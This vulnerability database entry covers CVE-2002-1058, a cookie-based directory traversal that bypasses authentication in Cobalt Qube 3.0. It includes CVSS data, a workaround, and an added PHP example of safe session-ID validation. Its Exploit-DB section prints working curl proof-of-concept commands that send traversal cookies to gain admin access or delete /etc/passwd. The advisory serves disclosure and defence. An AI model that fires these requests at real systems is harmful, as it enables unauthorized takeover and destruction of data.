CVE-2002-1058
CVSS 10.0
Published: 2002-10-04 00:00:00
Last revised: 2008-09-05 16:29:40

[Original] Directory traversal vulnerability in splashAdmin.php for Cobalt Qube 3.0 allows local users and remote attackers to gain privileges as the Qube Admin via .. (dot dot) sequences in the sessionId cookie that point to an alternate session file.


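[CNNVD] Cobalt Qube Authentication Bypass Vulnerability (CNNVD-200210-124)

        Cobalt Qube is a server appliance product from Sun.
        The Cobalt Qube authentication mechanism does not properly filter user input; a remote attacker can exploit this vulnerability to gain administrator privileges and perform various operations.
        The authentication mechanism is not robust. Because it does not properly validate the input supplied in the client cookie, an attacker can escalate privileges, or can designate a file on the server as the file containing the session key and, by exploiting the flaw in the authentication service, operate on that referenced file with administrator privileges, for example deleting part of the contents of /etc/passwd.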
        

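- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definition found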

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1058
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1058
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-124
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/5297
(VENDOR_ADVISORY)  BID  5297
http://www.iss.net/security_center/static/9669.php
(VENDOR_ADVISORY)  XF  cobalt-qube-admin-access(9669)
http://archives.neohapsis.com/archives/bugtraq/2002-07/0261.html
(UNKNOWN)  BUGTRAQ  20020723 Cobalt Qube 3 Administration page

- Vulnerability information

Cobalt Qube Authentication Bypass Vulnerability
Critical  Input validation
2002-10-04 00:00:00 2005-10-20 00:00:00
Remote
        
        

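- Advisories and patches

        Temporary workaround:
        If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Edit /usr/sausalito/ui/libPhp/ServerScriptHelper.php so that it contains the following code:
        line 64: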
        $sessionId = ereg_replace("\.\.","",$sessionId);
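        Vendor patch:
        Cobalt
        ------
        The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: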
        
        http://www.cobalt.com/products/qube/
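
The workaround above strips ".." from the cookie value; a stricter defence is to accept only values that match the expected session ID format and to confirm that the resolved file stays inside the session directory. The PHP below is an added example, not Cobalt code and not part of the original advisory; the session directory path, the 32-hex-character ID format and the function name resolveSessionFile are assumptions.

```php
<?php
// Added example, not Cobalt code. SESSION_DIR and the ID format are assumptions.
const SESSION_DIR = '/var/lib/example-ui/sessions';   // hypothetical location

/**
 * Return the absolute path of the session file for $sessionId, or null
 * if the cookie value is not a well-formed ID or resolves outside $baseDir.
 */
function resolveSessionFile(string $sessionId, string $baseDir = SESSION_DIR): ?string
{
    // 1. Allowlist: fixed-length hex token only (assumed format). Rejects
    //    "..", "/", NUL bytes and everything else that is not an ID.
    if (preg_match('/\A[0-9a-f]{32}\z/', $sessionId) !== 1) {
        return null;
    }
    // 2. Containment: canonicalise and confirm the file sits directly in
    //    the session directory (also catches symlinks pointing elsewhere).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $sessionId);
    if ($base === false || $path === false || dirname($path) !== $base) {
        return null;
    }
    return is_file($path) ? $path : null;
}

// Constructed demo: a temporary session directory with one valid session.
$dir = sys_get_temp_dir() . '/sessdemo_' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
$good = bin2hex(random_bytes(16));
file_put_contents("$dir/$good", "loginName=admin\n");

$samples = [
    $good,                        // well-formed ID with a session file
    '../../../../etc/passwd',     // traversal form described in the advisory
    '/../../../../tmp/test',      // leading-slash form
    str_repeat('0', 32),          // well-formed, but no such session exists
];
foreach ($samples as $id) {
    $result = resolveSessionFile($id, $dir);
    printf("%-40s => %s\n", $id, $result === null ? 'rejected' : 'accepted');
}
unlink("$dir/$good");
rmdir($dir);
```

Only the first sample is accepted; both traversal forms fail the format check before any filesystem call is made.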

- Vulnerability information (21640)

Cobalt Qube 3.0 Authentication Bypass Vulnerability (EDBID:21640)
php webapps
2002-07-24 Verified
0 pokley
N/A
source: http://www.securityfocus.com/bid/5297/info

A vulnerability has been reported for Cobalt Qube that may allow an attacker to bypass the authentication mechanism and obtain administrative privileges. 

The vulnerability occurs because of a weak authentication mechanism with Cobalt Qube appliances. The authentication mechanism fails to properly validate the input supplied in the client cookie. Thus it is possible for an attacker to refer to a file on the filesystem as that containing the session key. This vulnerability may be exploited by remote attackers to obtain administrative privileges on the device.

$ curl -b sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash http://192.168.0.1:444/splashAdmin.php

This will allow the attacker to delete the password file.

The following will enable the attacker to obtain administrative credentials on the vulnerable system.

$ curl -b sessionId=../codb/objects/4/.name\;loginName=admin http://192.168.0.1:444/splashAdmin.php

$ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin http://192.168.0.1:444/splashAdmin.php

- Vulnerability information

9053
Cobalt Qube splashAdmin.php sessionID Traversal Arbitrary File Access
Remote / Network Access Information Disclosure
Loss of Confidentiality
Exploit Public

- Vulnerability description

- Timeline

2002-07-24 Unknown
2002-07-24 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Cobalt Qube Authentication Bypass Vulnerability
Input Validation Error 5297
Yes No
2002-07-24 12:00:00 2009-07-11 02:56:00
Discovery credited to pokley <saleh@scan-associates.net>.

- Affected program versions

Cobalt Qube 3.0

- Exploit

The proofs of concept shown above (EDBID:21640) were provided by pokley <saleh@scan-associates.net>.

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related references

 

 
